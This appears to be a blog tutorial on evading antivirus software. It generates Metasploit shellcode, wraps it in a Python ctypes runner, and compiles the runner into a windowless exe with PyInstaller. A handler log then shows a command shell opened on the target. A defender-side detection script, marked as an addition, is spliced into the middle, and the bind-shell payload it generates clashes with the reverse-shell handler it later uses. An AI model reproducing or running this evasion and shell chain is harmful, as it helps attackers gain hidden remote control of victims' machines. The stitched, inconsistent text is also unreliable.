There are many ways to bypass antivirus software. This post describes one of them: write a Python program that invokes shellcode, then compile that Python program into an exe with PyInstaller.
Preparation (compiled in a Windows XP environment):

To compile a Python program into an exe you need the Python interpreter itself, the pywin32 library, and PyInstaller (extracted directly to the C: drive). If an error is reported during compilation, follow the instructions it gives to resolve it. Installation is not complicated and is not covered here.
https://www.python.org/ftp/python/2.7.8/python-2.7.8.msi
http://softlayer-dal.dl.sourceforge.net/project/pywin32/pywin32/Build%20219/pywin32-219.win32-py2.7.exe
https://pypi.python.org/packages/source/P/PyInstaller/PyInstaller-2.1.tar.gz
Use Metasploit to generate the shellcode that the Python program below will use.
msf payload(shell_bind_tcp) > show options

Module options (payload/windows/shell_bind_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  seh              yes       Exit technique (accepted: seh, thread, process, none)
   LPORT     4444             yes       The listen port
   RHOST     0.0.0.0          no        The target address

msf payload(shell_bind_tcp) > generate -b '\x00' -f /home/nixawk/bind_tcp.txt -p windows -t c
[*] Writing 1803 bytes to /home/nixawk/bind_tcp.txt...
Once the preparation is done, the Python program source is as follows:
from ctypes import *

shellcode = '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'

# Copy the shellcode into a ctypes buffer, treat the buffer's address as a
# C function pointer, and call it.
memorywithshell = create_string_buffer(shellcode, len(shellcode))
shell = cast(memorywithshell, CFUNCTYPE(c_void_p))
shell()
Compile the above Python file, which contains the shellcode, with PyInstaller using the following commands:
C:\PyInstaller-2.1\utils>python makespec.py --onefile --noconsole shellcode.py
wrote C:\PyInstaller-2.1\utils\shellcode.spec
now run pyinstaller.py to build the executable

C:\PyInstaller-2.1\utils>python build.py shellcode.spec
59 INFO: Testing for ability to set icons, version resources...
69 INFO: ... resource update available
79 INFO: UPX is not available.
109 INFO: Processing hook hook-os
259 INFO: Processing hook hook-time
259 INFO: Processing hook hook-cPickle
349 INFO: Processing hook hook-_sre
509 INFO: Processing hook hook-cStringIO
639 INFO: Processing hook hook-encodings
660 INFO: Processing hook hook-codecs
1171 INFO: Extending PYTHONPATH with C:\PyInstaller-2.1\utils
1171 INFO: checking Analysis
1171 INFO: building Analysis because out00-Analysis.toc non existent
1171 INFO: running Analysis out00-Analysis.toc
1171 INFO: Adding Microsoft.VC90.CRT to dependent assemblies of final executable
1171 INFO: Searching for assembly x86_Microsoft.VC90.CRT_1fc8b3b9a1e18e3b_9.0.21022.8_x-ww ...
1171 WARNING: Assembly not found
1180 ERROR: Assembly x86_Microsoft.VC90.CRT_1fc8b3b9a1e18e3b_9.0.21022.8_x-ww not found
1220 WARNING: lib not found: MSVCR90.dll dependency of C:\Python27\python.exe
1230 INFO: Searching for assembly x86_Microsoft.VC90.CRT_1fc8b3b9a1e18e3b_9.0.21022.8_x-ww ...
1230 WARNING: Assembly not found
1230 ERROR: Assembly x86_Microsoft.VC90.CRT_1fc8b3b9a1e18e3b_9.0.21022.8_x-ww not found
1351 WARNING: lib not found: MSVCR90.dll dependency of C:\WINDOWS\system32\python27.dll
1351 INFO: Analyzing C:\PyInstaller-2.1\PyInstaller\loader\_pyi_bootstrap.py
1381 INFO: Processing hook hook-os
1401 INFO: Processing hook hook-site
1421 INFO: Processing hook hook-encodings
1562 INFO: Processing hook hook-time
1562 INFO: Processing hook hook-cPickle
1661 INFO: Processing hook hook-_sre
1822 INFO: Processing hook hook-cStringIO
1961 INFO: Processing hook hook-codecs
2463 INFO: Processing hook hook-pydoc
2632 INFO: Processing hook hook-email
2713 INFO: Processing hook hook-httplib
2763 INFO: Processing hook hook-email.message
2844 INFO: Analyzing C:\PyInstaller-2.1\PyInstaller\loader\pyi_importers.py
2904 INFO: Analyzing C:\PyInstaller-2.1\PyInstaller\loader\pyi_archive.py
2963 INFO: Analyzing C:\PyInstaller-2.1\PyInstaller\loader\pyi_carchive.py
3043 INFO: Analyzing C:\PyInstaller-2.1\PyInstaller\loader\pyi_os_path.py
3043 INFO: Analyzing shellcode.py
3114 INFO: Hidden import 'codecs' has been found otherwise
3114 INFO: Hidden import 'encodings' has been found otherwise
3114 INFO: Looking for run-time hooks
3154 WARNING: lib not found: MSVCR90.dll dependency of C:\Python27\DLLs\select.pyd
3203 WARNING: lib not found: MSVCR90.dll dependency of C:\Python27\DLLs\unicodedata.pyd
3273 WARNING: lib not found: MSVCR90.dll dependency of C:\Python27\DLLs\_hashlib.pyd
3323 WARNING: lib not found: MSVCR90.dll dependency of C:\Python27\DLLs\bz2.pyd
3414 WARNING: lib not found: MSVCR90.dll dependency of C:\Python27\DLLs\_ssl.pyd
3484 WARNING: lib not found: MSVCR90.dll dependency of C:\Python27\DLLs\_ctypes.pyd
3555 WARNING: lib not found: MSVCR90.dll dependency of C:\Python27\DLLs\_socket.pyd
3575 INFO: Using Python library C:\WINDOWS\system32\python27.dll
3625 INFO: Warnings written to C:\PyInstaller-2.1\utils\build\shellcode\warnshellcode.txt
3634 INFO: checking PYZ
3634 INFO: rebuilding out00-PYZ.toc because out00-PYZ.pyz is missing
3634 INFO: building PYZ (ZlibArchive) out00-PYZ.toc
4815 INFO: checking PKG
4815 INFO: rebuilding out00-PKG.toc because out00-PKG.pkg is missing
4815 INFO: building PKG (CArchive) out00-PKG.pkg
6167 INFO: checking EXE
6167 INFO: rebuilding out00-EXE.toc because shellcode.exe missing
6167 INFO: building EXE from out00-EXE.toc
6167 INFO: Appending archive to EXE C:\PyInstaller-2.1\utils\dist\shellcode.exe
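As an added defender-side example (not code from the original post), the following Python 3 script covers both the build step above and the ctypes runner shown earlier: it locates the PyInstaller 2.x CArchive trailer that "Appending archive to EXE" writes to the end of the executable, and it statically flags Python source that uses the create_string_buffer / cast / CFUNCTYPE runner idiom. The sample executable bytes and sample sources are constructed; the trailer layout ('!8siiii' after the magic MEI\014\013\012\013\016) is that of PyInstaller 2.x.

```python
import ast
import struct

# PyInstaller 2.x appends a CArchive "cookie" to the exe: an 8-byte magic,
# then package length, TOC offset, TOC length and Python version (27 for
# Python 2.7), all big-endian 32-bit integers.
PYI_MAGIC = b"MEI\014\013\012\013\016"
PYI_COOKIE = struct.Struct("!8siiii")
# Calls that together form the ctypes shellcode-runner idiom from the post.
RUNNER_CALLS = {"create_string_buffer", "CFUNCTYPE", "cast"}

def find_pyinstaller_cookie(exe_bytes):
    """Return the parsed PyInstaller trailer as a dict, or None if absent."""
    pos = exe_bytes.rfind(PYI_MAGIC)
    if pos < 0 or pos + PYI_COOKIE.size > len(exe_bytes):
        return None
    _, pkg_len, toc_pos, toc_len, pyvers = PYI_COOKIE.unpack_from(exe_bytes, pos)
    return {"pkg_len": pkg_len, "toc_pos": toc_pos,
            "toc_len": toc_len, "python_version": pyvers}

def runner_indicators(source):
    """Names from RUNNER_CALLS that are actually called in the Python source."""
    seen = set()
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Call):
            fn = node.func
            name = fn.id if isinstance(fn, ast.Name) else getattr(fn, "attr", None)
            if name in RUNNER_CALLS:
                seen.add(name)
    return seen

def is_ctypes_shellcode_runner(source):
    """True only when the whole buffer -> cast -> CFUNCTYPE chain is present."""
    return runner_indicators(source) == RUNNER_CALLS

# Constructed sample inputs (not a real binary and not a real payload).
SAMPLE_EXE = (b"MZ" + b"\x00" * 62 + b"<packed python archive>"
              + PYI_COOKIE.pack(PYI_MAGIC, 1803, 100, 50, 27))
SAMPLE_RUNNER = """
from ctypes import *
shellcode = '<shellcode bytes>'
memorywithshell = create_string_buffer(shellcode, len(shellcode))
shell = cast(memorywithshell, CFUNCTYPE(c_void_p))
shell()
"""
SAMPLE_BENIGN = "import ctypes\nbuf = ctypes.create_string_buffer(16)\n"
```

A PyInstaller trailer on its own is not evidence of malice, since plenty of legitimate software ships this way; treat it as a triage hint that the embedded script should be extracted and checked with the second function.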
After compilation, copy shellcode.exe to the target host and run it; a reverse shell is obtained.
msf exploit(handler) > set payload windows/shell/reverse_tcp
payload => windows/shell/reverse_tcp
msf exploit(handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/shell/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (accepted: seh, thread, process, none)
   LHOST                      yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf exploit(handler) > set LHOST 192.168.1.107
LHOST => 192.168.1.107
msf exploit(handler) > run

[*] Started reverse handler on 192.168.1.107:4444
[*] Starting the payload handler...
[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (267 bytes) to 192.168.1.112
[*] Command shell session 1 opened (192.168.1.107:4444 -> 192.168.1.112:2061) at 2014-08-28 12:51:54 +0800

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\PyInstaller-2.1\utils>